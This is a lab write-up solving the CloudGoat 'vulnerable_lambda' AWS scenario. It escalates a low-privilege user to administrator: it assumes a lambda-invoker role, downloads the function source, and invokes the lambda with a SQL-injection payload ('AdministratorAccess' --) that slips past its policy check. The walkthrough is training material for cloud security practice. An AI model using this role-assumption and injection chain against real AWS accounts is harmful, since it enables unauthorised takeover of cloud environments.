# CloudGoat 2.0 - vulnerable_lambda [vulnerable\_lambda](https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/vulnerable_lambda/README.md) is one of the scenarios from [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat) - An intentionally vulnerable by design AWS setup. Difficulty: Easy ## Hands-On ### Task Initialize the terraform script to set the vulnerable scenario on your AWS account. ```bash ./cloudgoat.py create vulnerable_lambda ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700635525120/04f31305-fa88-4646-a3e9-b46cac4a146a.png align="center") Once the setup is complete, the new account credentials will be available in the below file. ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700635721192/8fe9b6bb-4d87-4ad4-97dd-c810af536621.png align="center") The task is to use these credentials to authenticate as low privileged user & escalate the privileges in the cloud environment. ### Hints The creator leaves us some hints to leverage & fast-track the win. ![Lucidchart Diagram](https://github.com/RhinoSecurityLabs/cloudgoat/raw/master/scenarios/vulnerable_lambda/exploitation_route.png align="left") ### Solution Authenticate using the new credentials. We use bilbo (got from hints screenshot) ```bash # Uses stdout instead of vim to show output export AWS_PAGER= aws configure --profile bilbo ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700636742592/63dfc6a2-9357-4b43-9e83-571e2285e599.png align="center") Check the user ID and account information ```bash aws sts get-caller-identity --profile bilbo ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700636884016/8d7c0279-f6c9-4658-88b5-3b0473bf0f67.png align="center") In the hints screenshot, it says "List IAM" roles. Let's try to do that ```bash aws iam list-roles --profile bilbo | jq '.Roles[].RoleName' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700637347388/b61a6a9b-ad56-4597-8e44-09d24166bdaa.png align="center") Among tens of roles, these two stand out for me considering, we are solving `vulnerable_lambda` challenge. Let's see what they are made of! The `` in the below command will be different for you as its randomly generated. Replace it accordingly. ```bash export ROLE_NAME=cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 aws iam get-role --profile bilbo --role-name $ROLE_NAME | jq -r '.Role.AssumeRolePolicyDocument.Statement' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700637657093/3035674a-eddb-4a63-9c8a-9a688f2e25d9.png align="center") We have two roles - one can assume any role as the current user & other can assume a role as lambda. Let's assume the `cg-lambda-invoker-...` role. To assume, the role, we need the role ARN. ```bash aws iam get-role --profile bilbo --role-name $ROLE_NAME | jq -r '.Role.Arn' ``` Use the arn from above & use it to assume role ```bash aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638264685/370ae921-6ee4-4af8-b225-b3c2e797bb5e.png align="center") Create a new profile with this assumed role or export them as environment variables ```bash output=$(aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session) export AWS_ACCESS_KEY_ID=$(echo $output | jq -r '.Credentials.AccessKeyId') export AWS_SECRET_ACCESS_KEY=$(echo $output | jq -r '.Credentials.SecretAccessKey') export AWS_SESSION_TOKEN=$(echo $output | jq -r '.Credentials.SessionToken') aws sts get-caller-identity ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638485982/3caffc8b-1a35-4c89-9945-4d2afab59f5c.png align="center") We can see, the current Arn points to `vulnerable-lambda-session`, so we are on the right path. Since this user is capable of performing lambda operations, let's try to list the lambda functions. #### Lambda functions & analysis ```bash aws lambda list-functions ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638729879/ee6445fa-37d3-4212-8c78-754fe16183e9.png align="center") In the description, we can see, `This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...` If that's true, we can add a managed policy like `AdministratorAccess` to our user & elevate the privileges. To validate, let's download the source code. ```bash # Get function name aws lambda list-functions | jq -r '.Functions[].FunctionName' aws lambda get-function --function-name $(aws lambda list-functions | jq -r '.Functions[].FunctionName') | jq -r '.Code' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638845117/ae6bc63b-e3fc-4e44-9e78-9cc5107dc619.png align="center") Download the source code from this location. ```bash mkdir /tmp/test wget -O /tmp/test/download.zip $(aws lambda get-function --function-name $(aws lambda list-functions | jq -r '.Functions[].FunctionName') | jq -r '.Code.Location') cd /tmp/test unzip download.zip ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700639024384/7aebc850-f367-4540-93e2-e03b15ff6944.png align="center") ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700639094644/f02cf042-28c4-499a-a484-8009b95c1fdb.png align="center") If you scroll to the end in `main.py`, we can the payload structure to invoke the lambda function. ```json { "policy_names": [ "AmazonSNSReadOnlyAccess", "AWSLambda_ReadOnlyAccess" ], "user_name": "cg-bilbo-user" } ``` Check the username of the `bilbo` profile user. ```bash aws sts get-caller-identity --profile bilbo ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809062088/cf05f79e-77d7-41d2-8604-edb0f60507c9.png align="center") Now, let's use this bilbo user & try to assign overprivileged permissions. In my case, the `user_name` is `cg-bilbo-vulnerable_lambda_cgid0isrortd10`. Save below inforamtion to `payload.json` ```json { "policy_names": [ "AmazonSNSReadOnlyAccess", "AWSLambda_ReadOnlyAccess", "AdministratorAccess" ], "user_name": "cg-bilbo-vulnerable_lambda_cgid0isrortd10" } ``` Let's use the current user with permissions to invoke lambda functions & pass this as input. ```bash aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809733527/a40e0df0-ff64-408d-8265-6072dc189319.png align="center") If you see the output, it says `AdministratorAccess` isn't an approved policy. #### SQL Injection If you see the `main.py` code, there's no validation on user input & it open's up a possibility for SQL injection. ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809851101/17861a5d-c030-455a-a355-38779e7492b0.png align="center") Let's try to create a payload with SQL injection. ```json { "policy_names": [ "AmazonSNSReadOnlyAccess", "AWSLambda_ReadOnlyAccess", "AdministratorAccess' --" ], "user_name": "cg-bilbo-vulnerable_lambda_cgid0isrortd10" } ``` Invoke the lambda function! ```bash aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809971048/74d15615-9e0a-42d0-83cd-852e56ee6491.png align="center") Let's check the permissions of this `bilbo` user now. We can check it using `list-attached-user-policies` ```bash aws sts get-caller-identity --profile bilbo # Get user-name from here aws iam list-attached-user-policies --profile bilbo --user-name cg-bilbo-vulnerable_lambda_cgid0isrortd10 ``` As you can see in the output, we have now `AdministratorAccess` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700810159162/5d4f2a8c-90e2-4672-9c52-d805921425bf.png align="center") We successfully elevated the privileges to be an administrator.